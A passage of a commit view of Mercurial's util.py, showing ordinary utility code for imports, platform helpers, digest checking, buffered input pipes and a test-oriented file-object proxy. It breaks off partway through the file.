##// END OF EJS Templates
util: fix the signature for the pypy override of sortdict.update()...
Matt Harbison -
r47662:64400d05 default
parent child Browse files
Show More
@@ -1,3730 +1,3732
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import locale
25 import locale
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37
37
38 from .thirdparty import attr
38 from .thirdparty import attr
39 from .pycompat import (
39 from .pycompat import (
40 delattr,
40 delattr,
41 getattr,
41 getattr,
42 open,
42 open,
43 setattr,
43 setattr,
44 )
44 )
45 from .node import hex
45 from .node import hex
46 from hgdemandimport import tracing
46 from hgdemandimport import tracing
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 policy,
51 policy,
52 pycompat,
52 pycompat,
53 urllibcompat,
53 urllibcompat,
54 )
54 )
55 from .utils import (
55 from .utils import (
56 compression,
56 compression,
57 hashutil,
57 hashutil,
58 procutil,
58 procutil,
59 stringutil,
59 stringutil,
60 )
60 )
61
61
62 if pycompat.TYPE_CHECKING:
62 if pycompat.TYPE_CHECKING:
63 from typing import (
63 from typing import (
64 Iterator,
64 Iterator,
65 List,
65 List,
66 Optional,
66 Optional,
67 Tuple,
67 Tuple,
68 Union,
68 Union,
69 )
69 )
70
70
71
71
72 base85 = policy.importmod('base85')
72 base85 = policy.importmod('base85')
73 osutil = policy.importmod('osutil')
73 osutil = policy.importmod('osutil')
74
74
75 b85decode = base85.b85decode
75 b85decode = base85.b85decode
76 b85encode = base85.b85encode
76 b85encode = base85.b85encode
77
77
78 cookielib = pycompat.cookielib
78 cookielib = pycompat.cookielib
79 httplib = pycompat.httplib
79 httplib = pycompat.httplib
80 pickle = pycompat.pickle
80 pickle = pycompat.pickle
81 safehasattr = pycompat.safehasattr
81 safehasattr = pycompat.safehasattr
82 socketserver = pycompat.socketserver
82 socketserver = pycompat.socketserver
83 bytesio = pycompat.bytesio
83 bytesio = pycompat.bytesio
84 # TODO deprecate stringio name, as it is a lie on Python 3.
84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 stringio = bytesio
85 stringio = bytesio
86 xmlrpclib = pycompat.xmlrpclib
86 xmlrpclib = pycompat.xmlrpclib
87
87
88 httpserver = urllibcompat.httpserver
88 httpserver = urllibcompat.httpserver
89 urlerr = urllibcompat.urlerr
89 urlerr = urllibcompat.urlerr
90 urlreq = urllibcompat.urlreq
90 urlreq = urllibcompat.urlreq
91
91
92 # workaround for win32mbcs
92 # workaround for win32mbcs
93 _filenamebytestr = pycompat.bytestr
93 _filenamebytestr = pycompat.bytestr
94
94
95 if pycompat.iswindows:
95 if pycompat.iswindows:
96 from . import windows as platform
96 from . import windows as platform
97 else:
97 else:
98 from . import posix as platform
98 from . import posix as platform
99
99
100 _ = i18n._
100 _ = i18n._
101
101
102 bindunixsocket = platform.bindunixsocket
102 bindunixsocket = platform.bindunixsocket
103 cachestat = platform.cachestat
103 cachestat = platform.cachestat
104 checkexec = platform.checkexec
104 checkexec = platform.checkexec
105 checklink = platform.checklink
105 checklink = platform.checklink
106 copymode = platform.copymode
106 copymode = platform.copymode
107 expandglobs = platform.expandglobs
107 expandglobs = platform.expandglobs
108 getfsmountpoint = platform.getfsmountpoint
108 getfsmountpoint = platform.getfsmountpoint
109 getfstype = platform.getfstype
109 getfstype = platform.getfstype
110 groupmembers = platform.groupmembers
110 groupmembers = platform.groupmembers
111 groupname = platform.groupname
111 groupname = platform.groupname
112 isexec = platform.isexec
112 isexec = platform.isexec
113 isowner = platform.isowner
113 isowner = platform.isowner
114 listdir = osutil.listdir
114 listdir = osutil.listdir
115 localpath = platform.localpath
115 localpath = platform.localpath
116 lookupreg = platform.lookupreg
116 lookupreg = platform.lookupreg
117 makedir = platform.makedir
117 makedir = platform.makedir
118 nlinks = platform.nlinks
118 nlinks = platform.nlinks
119 normpath = platform.normpath
119 normpath = platform.normpath
120 normcase = platform.normcase
120 normcase = platform.normcase
121 normcasespec = platform.normcasespec
121 normcasespec = platform.normcasespec
122 normcasefallback = platform.normcasefallback
122 normcasefallback = platform.normcasefallback
123 openhardlinks = platform.openhardlinks
123 openhardlinks = platform.openhardlinks
124 oslink = platform.oslink
124 oslink = platform.oslink
125 parsepatchoutput = platform.parsepatchoutput
125 parsepatchoutput = platform.parsepatchoutput
126 pconvert = platform.pconvert
126 pconvert = platform.pconvert
127 poll = platform.poll
127 poll = platform.poll
128 posixfile = platform.posixfile
128 posixfile = platform.posixfile
129 readlink = platform.readlink
129 readlink = platform.readlink
130 rename = platform.rename
130 rename = platform.rename
131 removedirs = platform.removedirs
131 removedirs = platform.removedirs
132 samedevice = platform.samedevice
132 samedevice = platform.samedevice
133 samefile = platform.samefile
133 samefile = platform.samefile
134 samestat = platform.samestat
134 samestat = platform.samestat
135 setflags = platform.setflags
135 setflags = platform.setflags
136 split = platform.split
136 split = platform.split
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 statisexec = platform.statisexec
138 statisexec = platform.statisexec
139 statislink = platform.statislink
139 statislink = platform.statislink
140 umask = platform.umask
140 umask = platform.umask
141 unlink = platform.unlink
141 unlink = platform.unlink
142 username = platform.username
142 username = platform.username
143
143
144
144
145 def setumask(val):
145 def setumask(val):
146 # type: (int) -> None
146 # type: (int) -> None
147 ''' updates the umask. used by chg server '''
147 ''' updates the umask. used by chg server '''
148 if pycompat.iswindows:
148 if pycompat.iswindows:
149 return
149 return
150 os.umask(val)
150 os.umask(val)
151 global umask
151 global umask
152 platform.umask = umask = val & 0o777
152 platform.umask = umask = val & 0o777
153
153
154
154
155 # small compat layer
155 # small compat layer
156 compengines = compression.compengines
156 compengines = compression.compengines
157 SERVERROLE = compression.SERVERROLE
157 SERVERROLE = compression.SERVERROLE
158 CLIENTROLE = compression.CLIENTROLE
158 CLIENTROLE = compression.CLIENTROLE
159
159
160 try:
160 try:
161 recvfds = osutil.recvfds
161 recvfds = osutil.recvfds
162 except AttributeError:
162 except AttributeError:
163 pass
163 pass
164
164
165 # Python compatibility
165 # Python compatibility
166
166
167 _notset = object()
167 _notset = object()
168
168
169
169
170 def bitsfrom(container):
170 def bitsfrom(container):
171 bits = 0
171 bits = 0
172 for bit in container:
172 for bit in container:
173 bits |= bit
173 bits |= bit
174 return bits
174 return bits
175
175
176
176
177 # python 2.6 still have deprecation warning enabled by default. We do not want
177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 # to display anything to standard user so detect if we are running test and
178 # to display anything to standard user so detect if we are running test and
179 # only use python deprecation warning in this case.
179 # only use python deprecation warning in this case.
180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 if _dowarn:
181 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
182 # explicitly unfilter our warning for python 2.7
183 #
183 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 if _dowarn and pycompat.ispy3:
191 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
192 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(
193 warnings.filterwarnings(
194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 )
195 )
196 warnings.filterwarnings(
196 warnings.filterwarnings(
197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 )
198 )
199 # TODO: reinvent imp.is_frozen()
199 # TODO: reinvent imp.is_frozen()
200 warnings.filterwarnings(
200 warnings.filterwarnings(
201 'ignore',
201 'ignore',
202 'the imp module is deprecated',
202 'the imp module is deprecated',
203 DeprecationWarning,
203 DeprecationWarning,
204 'mercurial',
204 'mercurial',
205 )
205 )
206
206
207
207
208 def nouideprecwarn(msg, version, stacklevel=1):
208 def nouideprecwarn(msg, version, stacklevel=1):
209 """Issue an python native deprecation warning
209 """Issue an python native deprecation warning
210
210
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 """
212 """
213 if _dowarn:
213 if _dowarn:
214 msg += (
214 msg += (
215 b"\n(compatibility will be dropped after Mercurial-%s,"
215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 b" update your code.)"
216 b" update your code.)"
217 ) % version
217 ) % version
218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 # on python 3 with chg, we will need to explicitly flush the output
219 # on python 3 with chg, we will need to explicitly flush the output
220 sys.stderr.flush()
220 sys.stderr.flush()
221
221
222
222
223 DIGESTS = {
223 DIGESTS = {
224 b'md5': hashlib.md5,
224 b'md5': hashlib.md5,
225 b'sha1': hashutil.sha1,
225 b'sha1': hashutil.sha1,
226 b'sha512': hashlib.sha512,
226 b'sha512': hashlib.sha512,
227 }
227 }
228 # List of digest types from strongest to weakest
228 # List of digest types from strongest to weakest
229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230
230
231 for k in DIGESTS_BY_STRENGTH:
231 for k in DIGESTS_BY_STRENGTH:
232 assert k in DIGESTS
232 assert k in DIGESTS
233
233
234
234
235 class digester(object):
235 class digester(object):
236 """helper to compute digests.
236 """helper to compute digests.
237
237
238 This helper can be used to compute one or more digests given their name.
238 This helper can be used to compute one or more digests given their name.
239
239
240 >>> d = digester([b'md5', b'sha1'])
240 >>> d = digester([b'md5', b'sha1'])
241 >>> d.update(b'foo')
241 >>> d.update(b'foo')
242 >>> [k for k in sorted(d)]
242 >>> [k for k in sorted(d)]
243 ['md5', 'sha1']
243 ['md5', 'sha1']
244 >>> d[b'md5']
244 >>> d[b'md5']
245 'acbd18db4cc2f85cedef654fccc4a4d8'
245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 >>> d[b'sha1']
246 >>> d[b'sha1']
247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 >>> digester.preferred([b'md5', b'sha1'])
248 >>> digester.preferred([b'md5', b'sha1'])
249 'sha1'
249 'sha1'
250 """
250 """
251
251
252 def __init__(self, digests, s=b''):
252 def __init__(self, digests, s=b''):
253 self._hashes = {}
253 self._hashes = {}
254 for k in digests:
254 for k in digests:
255 if k not in DIGESTS:
255 if k not in DIGESTS:
256 raise error.Abort(_(b'unknown digest type: %s') % k)
256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 self._hashes[k] = DIGESTS[k]()
257 self._hashes[k] = DIGESTS[k]()
258 if s:
258 if s:
259 self.update(s)
259 self.update(s)
260
260
261 def update(self, data):
261 def update(self, data):
262 for h in self._hashes.values():
262 for h in self._hashes.values():
263 h.update(data)
263 h.update(data)
264
264
265 def __getitem__(self, key):
265 def __getitem__(self, key):
266 if key not in DIGESTS:
266 if key not in DIGESTS:
267 raise error.Abort(_(b'unknown digest type: %s') % k)
267 raise error.Abort(_(b'unknown digest type: %s') % k)
268 return hex(self._hashes[key].digest())
268 return hex(self._hashes[key].digest())
269
269
270 def __iter__(self):
270 def __iter__(self):
271 return iter(self._hashes)
271 return iter(self._hashes)
272
272
273 @staticmethod
273 @staticmethod
274 def preferred(supported):
274 def preferred(supported):
275 """returns the strongest digest type in both supported and DIGESTS."""
275 """returns the strongest digest type in both supported and DIGESTS."""
276
276
277 for k in DIGESTS_BY_STRENGTH:
277 for k in DIGESTS_BY_STRENGTH:
278 if k in supported:
278 if k in supported:
279 return k
279 return k
280 return None
280 return None
281
281
282
282
283 class digestchecker(object):
283 class digestchecker(object):
284 """file handle wrapper that additionally checks content against a given
284 """file handle wrapper that additionally checks content against a given
285 size and digests.
285 size and digests.
286
286
287 d = digestchecker(fh, size, {'md5': '...'})
287 d = digestchecker(fh, size, {'md5': '...'})
288
288
289 When multiple digests are given, all of them are validated.
289 When multiple digests are given, all of them are validated.
290 """
290 """
291
291
292 def __init__(self, fh, size, digests):
292 def __init__(self, fh, size, digests):
293 self._fh = fh
293 self._fh = fh
294 self._size = size
294 self._size = size
295 self._got = 0
295 self._got = 0
296 self._digests = dict(digests)
296 self._digests = dict(digests)
297 self._digester = digester(self._digests.keys())
297 self._digester = digester(self._digests.keys())
298
298
299 def read(self, length=-1):
299 def read(self, length=-1):
300 content = self._fh.read(length)
300 content = self._fh.read(length)
301 self._digester.update(content)
301 self._digester.update(content)
302 self._got += len(content)
302 self._got += len(content)
303 return content
303 return content
304
304
305 def validate(self):
305 def validate(self):
306 if self._size != self._got:
306 if self._size != self._got:
307 raise error.Abort(
307 raise error.Abort(
308 _(b'size mismatch: expected %d, got %d')
308 _(b'size mismatch: expected %d, got %d')
309 % (self._size, self._got)
309 % (self._size, self._got)
310 )
310 )
311 for k, v in self._digests.items():
311 for k, v in self._digests.items():
312 if v != self._digester[k]:
312 if v != self._digester[k]:
313 # i18n: first parameter is a digest name
313 # i18n: first parameter is a digest name
314 raise error.Abort(
314 raise error.Abort(
315 _(b'%s mismatch: expected %s, got %s')
315 _(b'%s mismatch: expected %s, got %s')
316 % (k, v, self._digester[k])
316 % (k, v, self._digester[k])
317 )
317 )
318
318
319
319
320 try:
320 try:
321 buffer = buffer # pytype: disable=name-error
321 buffer = buffer # pytype: disable=name-error
322 except NameError:
322 except NameError:
323
323
324 def buffer(sliceable, offset=0, length=None):
324 def buffer(sliceable, offset=0, length=None):
325 if length is not None:
325 if length is not None:
326 return memoryview(sliceable)[offset : offset + length]
326 return memoryview(sliceable)[offset : offset + length]
327 return memoryview(sliceable)[offset:]
327 return memoryview(sliceable)[offset:]
328
328
329
329
330 _chunksize = 4096
330 _chunksize = 4096
331
331
332
332
333 class bufferedinputpipe(object):
333 class bufferedinputpipe(object):
334 """a manually buffered input pipe
334 """a manually buffered input pipe
335
335
336 Python will not let us use buffered IO and lazy reading with 'polling' at
336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 the same time. We cannot probe the buffer state and select will not detect
337 the same time. We cannot probe the buffer state and select will not detect
338 that data are ready to read if they are already buffered.
338 that data are ready to read if they are already buffered.
339
339
340 This class let us work around that by implementing its own buffering
340 This class let us work around that by implementing its own buffering
341 (allowing efficient readline) while offering a way to know if the buffer is
341 (allowing efficient readline) while offering a way to know if the buffer is
342 empty from the output (allowing collaboration of the buffer with polling).
342 empty from the output (allowing collaboration of the buffer with polling).
343
343
344 This class lives in the 'util' module because it makes use of the 'os'
344 This class lives in the 'util' module because it makes use of the 'os'
345 module from the python stdlib.
345 module from the python stdlib.
346 """
346 """
347
347
348 def __new__(cls, fh):
348 def __new__(cls, fh):
349 # If we receive a fileobjectproxy, we need to use a variation of this
349 # If we receive a fileobjectproxy, we need to use a variation of this
350 # class that notifies observers about activity.
350 # class that notifies observers about activity.
351 if isinstance(fh, fileobjectproxy):
351 if isinstance(fh, fileobjectproxy):
352 cls = observedbufferedinputpipe
352 cls = observedbufferedinputpipe
353
353
354 return super(bufferedinputpipe, cls).__new__(cls)
354 return super(bufferedinputpipe, cls).__new__(cls)
355
355
356 def __init__(self, input):
356 def __init__(self, input):
357 self._input = input
357 self._input = input
358 self._buffer = []
358 self._buffer = []
359 self._eof = False
359 self._eof = False
360 self._lenbuf = 0
360 self._lenbuf = 0
361
361
362 @property
362 @property
363 def hasbuffer(self):
363 def hasbuffer(self):
364 """True is any data is currently buffered
364 """True is any data is currently buffered
365
365
366 This will be used externally a pre-step for polling IO. If there is
366 This will be used externally a pre-step for polling IO. If there is
367 already data then no polling should be set in place."""
367 already data then no polling should be set in place."""
368 return bool(self._buffer)
368 return bool(self._buffer)
369
369
370 @property
370 @property
371 def closed(self):
371 def closed(self):
372 return self._input.closed
372 return self._input.closed
373
373
374 def fileno(self):
374 def fileno(self):
375 return self._input.fileno()
375 return self._input.fileno()
376
376
377 def close(self):
377 def close(self):
378 return self._input.close()
378 return self._input.close()
379
379
380 def read(self, size):
380 def read(self, size):
381 while (not self._eof) and (self._lenbuf < size):
381 while (not self._eof) and (self._lenbuf < size):
382 self._fillbuffer()
382 self._fillbuffer()
383 return self._frombuffer(size)
383 return self._frombuffer(size)
384
384
385 def unbufferedread(self, size):
385 def unbufferedread(self, size):
386 if not self._eof and self._lenbuf == 0:
386 if not self._eof and self._lenbuf == 0:
387 self._fillbuffer(max(size, _chunksize))
387 self._fillbuffer(max(size, _chunksize))
388 return self._frombuffer(min(self._lenbuf, size))
388 return self._frombuffer(min(self._lenbuf, size))
389
389
390 def readline(self, *args, **kwargs):
390 def readline(self, *args, **kwargs):
391 if len(self._buffer) > 1:
391 if len(self._buffer) > 1:
392 # this should not happen because both read and readline end with a
392 # this should not happen because both read and readline end with a
393 # _frombuffer call that collapse it.
393 # _frombuffer call that collapse it.
394 self._buffer = [b''.join(self._buffer)]
394 self._buffer = [b''.join(self._buffer)]
395 self._lenbuf = len(self._buffer[0])
395 self._lenbuf = len(self._buffer[0])
396 lfi = -1
396 lfi = -1
397 if self._buffer:
397 if self._buffer:
398 lfi = self._buffer[-1].find(b'\n')
398 lfi = self._buffer[-1].find(b'\n')
399 while (not self._eof) and lfi < 0:
399 while (not self._eof) and lfi < 0:
400 self._fillbuffer()
400 self._fillbuffer()
401 if self._buffer:
401 if self._buffer:
402 lfi = self._buffer[-1].find(b'\n')
402 lfi = self._buffer[-1].find(b'\n')
403 size = lfi + 1
403 size = lfi + 1
404 if lfi < 0: # end of file
404 if lfi < 0: # end of file
405 size = self._lenbuf
405 size = self._lenbuf
406 elif len(self._buffer) > 1:
406 elif len(self._buffer) > 1:
407 # we need to take previous chunks into account
407 # we need to take previous chunks into account
408 size += self._lenbuf - len(self._buffer[-1])
408 size += self._lenbuf - len(self._buffer[-1])
409 return self._frombuffer(size)
409 return self._frombuffer(size)
410
410
411 def _frombuffer(self, size):
411 def _frombuffer(self, size):
412 """return at most 'size' data from the buffer
412 """return at most 'size' data from the buffer
413
413
414 The data are removed from the buffer."""
414 The data are removed from the buffer."""
415 if size == 0 or not self._buffer:
415 if size == 0 or not self._buffer:
416 return b''
416 return b''
417 buf = self._buffer[0]
417 buf = self._buffer[0]
418 if len(self._buffer) > 1:
418 if len(self._buffer) > 1:
419 buf = b''.join(self._buffer)
419 buf = b''.join(self._buffer)
420
420
421 data = buf[:size]
421 data = buf[:size]
422 buf = buf[len(data) :]
422 buf = buf[len(data) :]
423 if buf:
423 if buf:
424 self._buffer = [buf]
424 self._buffer = [buf]
425 self._lenbuf = len(buf)
425 self._lenbuf = len(buf)
426 else:
426 else:
427 self._buffer = []
427 self._buffer = []
428 self._lenbuf = 0
428 self._lenbuf = 0
429 return data
429 return data
430
430
431 def _fillbuffer(self, size=_chunksize):
431 def _fillbuffer(self, size=_chunksize):
432 """read data to the buffer"""
432 """read data to the buffer"""
433 data = os.read(self._input.fileno(), size)
433 data = os.read(self._input.fileno(), size)
434 if not data:
434 if not data:
435 self._eof = True
435 self._eof = True
436 else:
436 else:
437 self._lenbuf += len(data)
437 self._lenbuf += len(data)
438 self._buffer.append(data)
438 self._buffer.append(data)
439
439
440 return data
440 return data
441
441
442
442
443 def mmapread(fp, size=None):
443 def mmapread(fp, size=None):
444 if size == 0:
444 if size == 0:
445 # size of 0 to mmap.mmap() means "all data"
445 # size of 0 to mmap.mmap() means "all data"
446 # rather than "zero bytes", so special case that.
446 # rather than "zero bytes", so special case that.
447 return b''
447 return b''
448 elif size is None:
448 elif size is None:
449 size = 0
449 size = 0
450 try:
450 try:
451 fd = getattr(fp, 'fileno', lambda: fp)()
451 fd = getattr(fp, 'fileno', lambda: fp)()
452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 except ValueError:
453 except ValueError:
454 # Empty files cannot be mmapped, but mmapread should still work. Check
454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 # if the file is empty, and if so, return an empty buffer.
455 # if the file is empty, and if so, return an empty buffer.
456 if os.fstat(fd).st_size == 0:
456 if os.fstat(fd).st_size == 0:
457 return b''
457 return b''
458 raise
458 raise
459
459
460
460
461 class fileobjectproxy(object):
461 class fileobjectproxy(object):
462 """A proxy around file objects that tells a watcher when events occur.
462 """A proxy around file objects that tells a watcher when events occur.
463
463
464 This type is intended to only be used for testing purposes. Think hard
464 This type is intended to only be used for testing purposes. Think hard
465 before using it in important code.
465 before using it in important code.
466 """
466 """
467
467
468 __slots__ = (
468 __slots__ = (
469 '_orig',
469 '_orig',
470 '_observer',
470 '_observer',
471 )
471 )
472
472
473 def __init__(self, fh, observer):
473 def __init__(self, fh, observer):
474 object.__setattr__(self, '_orig', fh)
474 object.__setattr__(self, '_orig', fh)
475 object.__setattr__(self, '_observer', observer)
475 object.__setattr__(self, '_observer', observer)
476
476
477 def __getattribute__(self, name):
477 def __getattribute__(self, name):
478 ours = {
478 ours = {
479 '_observer',
479 '_observer',
480 # IOBase
480 # IOBase
481 'close',
481 'close',
482 # closed if a property
482 # closed if a property
483 'fileno',
483 'fileno',
484 'flush',
484 'flush',
485 'isatty',
485 'isatty',
486 'readable',
486 'readable',
487 'readline',
487 'readline',
488 'readlines',
488 'readlines',
489 'seek',
489 'seek',
490 'seekable',
490 'seekable',
491 'tell',
491 'tell',
492 'truncate',
492 'truncate',
493 'writable',
493 'writable',
494 'writelines',
494 'writelines',
495 # RawIOBase
495 # RawIOBase
496 'read',
496 'read',
497 'readall',
497 'readall',
498 'readinto',
498 'readinto',
499 'write',
499 'write',
500 # BufferedIOBase
500 # BufferedIOBase
501 # raw is a property
501 # raw is a property
502 'detach',
502 'detach',
503 # read defined above
503 # read defined above
504 'read1',
504 'read1',
505 # readinto defined above
505 # readinto defined above
506 # write defined above
506 # write defined above
507 }
507 }
508
508
509 # We only observe some methods.
509 # We only observe some methods.
510 if name in ours:
510 if name in ours:
511 return object.__getattribute__(self, name)
511 return object.__getattribute__(self, name)
512
512
513 return getattr(object.__getattribute__(self, '_orig'), name)
513 return getattr(object.__getattribute__(self, '_orig'), name)
514
514
515 def __nonzero__(self):
515 def __nonzero__(self):
516 return bool(object.__getattribute__(self, '_orig'))
516 return bool(object.__getattribute__(self, '_orig'))
517
517
518 __bool__ = __nonzero__
518 __bool__ = __nonzero__
519
519
520 def __delattr__(self, name):
520 def __delattr__(self, name):
521 return delattr(object.__getattribute__(self, '_orig'), name)
521 return delattr(object.__getattribute__(self, '_orig'), name)
522
522
523 def __setattr__(self, name, value):
523 def __setattr__(self, name, value):
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525
525
526 def __iter__(self):
526 def __iter__(self):
527 return object.__getattribute__(self, '_orig').__iter__()
527 return object.__getattribute__(self, '_orig').__iter__()
528
528
529 def _observedcall(self, name, *args, **kwargs):
529 def _observedcall(self, name, *args, **kwargs):
530 # Call the original object.
530 # Call the original object.
531 orig = object.__getattribute__(self, '_orig')
531 orig = object.__getattribute__(self, '_orig')
532 res = getattr(orig, name)(*args, **kwargs)
532 res = getattr(orig, name)(*args, **kwargs)
533
533
534 # Call a method on the observer of the same name with arguments
534 # Call a method on the observer of the same name with arguments
535 # so it can react, log, etc.
535 # so it can react, log, etc.
536 observer = object.__getattribute__(self, '_observer')
536 observer = object.__getattribute__(self, '_observer')
537 fn = getattr(observer, name, None)
537 fn = getattr(observer, name, None)
538 if fn:
538 if fn:
539 fn(res, *args, **kwargs)
539 fn(res, *args, **kwargs)
540
540
541 return res
541 return res
542
542
543 def close(self, *args, **kwargs):
543 def close(self, *args, **kwargs):
544 return object.__getattribute__(self, '_observedcall')(
544 return object.__getattribute__(self, '_observedcall')(
545 'close', *args, **kwargs
545 'close', *args, **kwargs
546 )
546 )
547
547
548 def fileno(self, *args, **kwargs):
548 def fileno(self, *args, **kwargs):
549 return object.__getattribute__(self, '_observedcall')(
549 return object.__getattribute__(self, '_observedcall')(
550 'fileno', *args, **kwargs
550 'fileno', *args, **kwargs
551 )
551 )
552
552
553 def flush(self, *args, **kwargs):
553 def flush(self, *args, **kwargs):
554 return object.__getattribute__(self, '_observedcall')(
554 return object.__getattribute__(self, '_observedcall')(
555 'flush', *args, **kwargs
555 'flush', *args, **kwargs
556 )
556 )
557
557
558 def isatty(self, *args, **kwargs):
558 def isatty(self, *args, **kwargs):
559 return object.__getattribute__(self, '_observedcall')(
559 return object.__getattribute__(self, '_observedcall')(
560 'isatty', *args, **kwargs
560 'isatty', *args, **kwargs
561 )
561 )
562
562
563 def readable(self, *args, **kwargs):
563 def readable(self, *args, **kwargs):
564 return object.__getattribute__(self, '_observedcall')(
564 return object.__getattribute__(self, '_observedcall')(
565 'readable', *args, **kwargs
565 'readable', *args, **kwargs
566 )
566 )
567
567
568 def readline(self, *args, **kwargs):
568 def readline(self, *args, **kwargs):
569 return object.__getattribute__(self, '_observedcall')(
569 return object.__getattribute__(self, '_observedcall')(
570 'readline', *args, **kwargs
570 'readline', *args, **kwargs
571 )
571 )
572
572
573 def readlines(self, *args, **kwargs):
573 def readlines(self, *args, **kwargs):
574 return object.__getattribute__(self, '_observedcall')(
574 return object.__getattribute__(self, '_observedcall')(
575 'readlines', *args, **kwargs
575 'readlines', *args, **kwargs
576 )
576 )
577
577
578 def seek(self, *args, **kwargs):
578 def seek(self, *args, **kwargs):
579 return object.__getattribute__(self, '_observedcall')(
579 return object.__getattribute__(self, '_observedcall')(
580 'seek', *args, **kwargs
580 'seek', *args, **kwargs
581 )
581 )
582
582
583 def seekable(self, *args, **kwargs):
583 def seekable(self, *args, **kwargs):
584 return object.__getattribute__(self, '_observedcall')(
584 return object.__getattribute__(self, '_observedcall')(
585 'seekable', *args, **kwargs
585 'seekable', *args, **kwargs
586 )
586 )
587
587
588 def tell(self, *args, **kwargs):
588 def tell(self, *args, **kwargs):
589 return object.__getattribute__(self, '_observedcall')(
589 return object.__getattribute__(self, '_observedcall')(
590 'tell', *args, **kwargs
590 'tell', *args, **kwargs
591 )
591 )
592
592
593 def truncate(self, *args, **kwargs):
593 def truncate(self, *args, **kwargs):
594 return object.__getattribute__(self, '_observedcall')(
594 return object.__getattribute__(self, '_observedcall')(
595 'truncate', *args, **kwargs
595 'truncate', *args, **kwargs
596 )
596 )
597
597
598 def writable(self, *args, **kwargs):
598 def writable(self, *args, **kwargs):
599 return object.__getattribute__(self, '_observedcall')(
599 return object.__getattribute__(self, '_observedcall')(
600 'writable', *args, **kwargs
600 'writable', *args, **kwargs
601 )
601 )
602
602
603 def writelines(self, *args, **kwargs):
603 def writelines(self, *args, **kwargs):
604 return object.__getattribute__(self, '_observedcall')(
604 return object.__getattribute__(self, '_observedcall')(
605 'writelines', *args, **kwargs
605 'writelines', *args, **kwargs
606 )
606 )
607
607
608 def read(self, *args, **kwargs):
608 def read(self, *args, **kwargs):
609 return object.__getattribute__(self, '_observedcall')(
609 return object.__getattribute__(self, '_observedcall')(
610 'read', *args, **kwargs
610 'read', *args, **kwargs
611 )
611 )
612
612
613 def readall(self, *args, **kwargs):
613 def readall(self, *args, **kwargs):
614 return object.__getattribute__(self, '_observedcall')(
614 return object.__getattribute__(self, '_observedcall')(
615 'readall', *args, **kwargs
615 'readall', *args, **kwargs
616 )
616 )
617
617
618 def readinto(self, *args, **kwargs):
